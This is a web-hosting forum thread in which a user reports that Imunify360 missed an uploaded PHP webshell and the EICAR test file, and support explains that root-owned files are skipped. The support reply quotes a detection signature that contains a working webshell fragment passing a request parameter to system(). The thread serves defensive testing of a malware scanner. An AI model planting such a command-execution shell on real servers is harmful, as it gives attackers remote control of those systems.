Announcement

Collapse
No announcement yet.

Testing protections fails

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
  • #1

    Testing protections fails

    Hello,

    I was testing the product before purchase, and I did notice some issues and lack of information around testing PHP Hardening.

    To enable Hardened PHP, I needed to find a proper documentation, it was painful.
    Even the following command was not accurate:

    imunify360-agent features status hardened-php was saying I had the handlers installed when I did not.

    ​Could you guys provide some intended testcases/examples to know if it's working?


    Some of the other tests I did, was upload a malicious php file, and execute commands like the eicar test successfully.
    • Upload php webshell via scp, NOT DETECTED (virustotal hash: 45eb1bc5e5f4f3620eeb2ef62c311ab908defa3cb0f0b162e6 62978d7783fb3f)
    • Manually scan the webshell php file providing fullpath: "No malware found"
    • Used the webshell to download eicar file as provided in FAQ: wget http://www.eicar.org/download/eicar.com.txt -O /tmp/eicar.com.txt NOT DETECTED
    • Upload via SCP the eicar file. NOT DETECTED
    • Manually scan the eicar file: "No malware found"​​​

    Running Plesk on a Linux server 4.19.0-23-amd64 #1 SMP Debian 4.19.269-1 (2022-12-20) x86_64 GNU/Linux
    i360 settings are all enabled, real time proteccion, php hardening, etc.

    Thanks in advance,
    Regards,



    Links:
    Hardened PHP: https://cloudlinux.zendesk.com/hc/en...-on-Imunify360
    ​FAQ: https://docs.imunify360.com/faq_and_...ity-scan-works
    VT: https://www.virustotal.com/gui/file/...fa3cb0f0b162e6 62978d7783fb3f
    Tags: None
  • #2
    Hello,

    Even the following command was not accurate:

    imunify360-agent features status hardened-php was saying I had the handlers installed when I did not.


    Could you please provide us with the output of this command?

    • Upload php webshell via scp, NOT DETECTED (virustotal hash: 45eb1bc5e5f4f3620eeb2ef62c311ab908defa3cb0f0b162e6 62978d7783fb3f)
    • Manually scan the webshell php file providing fullpath: "No malware found"
    • Used the webshell to download eicar file as provided in FAQ: wget http://www.eicar.org/download/eicar.com.txt -O /tmp/eicar.com.txt NOT DETECTED
    • Upload via SCP the eicar file. NOT DETECTED
    • Manually scan the eicar file: "No malware found"
    The undetected results might be caused​ by the ownership/permissions of the file uploaded. For example, if you upload a file to the user's directory as root, it won't be detected by the Imunify scanner: https://cloudlinux.zendesk.com/hc/en...-owned-by-root

    I've checked the provided hash with the latest build of our scan and can confirm our malware database has this hash – it is detected with the following signature:

    HTML Code:
      	php_malware:  	 		fn: /var/imunify360-malware-sigs-server/data/builds/12836/scan/1728048754/04a00fef483d1c2f2632cbd40aef98799fc9bd0ad4b0bca7e2 34bdc0c15a547f 		sig: ...RVER['PHP_SELF']);?>"><input type="TEXT" name="cmd" id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre> @!!!><?php if(isset($_GET['cmd'])){system($_GET['cmd']);}?></pre></body><script>document.getElementById("cmd").focus( );</scr 		ct: 1728048753 		mt: 1728048753 		sz: 347 		et: 1728048758 		hash: 351f51d22cf6c5f9512a8114ecbfcac79c465713 		sigid: id_64c1e4d1 		sha256: 45eb1bc5e5f4f3620eeb2ef62c311ab908defa3cb0f0b162e6 62978d7783fb3f 		sn: SMW-INJ-03765-php.bkdr.wshll-12 	 	  ​

    Comment

    Previous template Next
    Working...
    X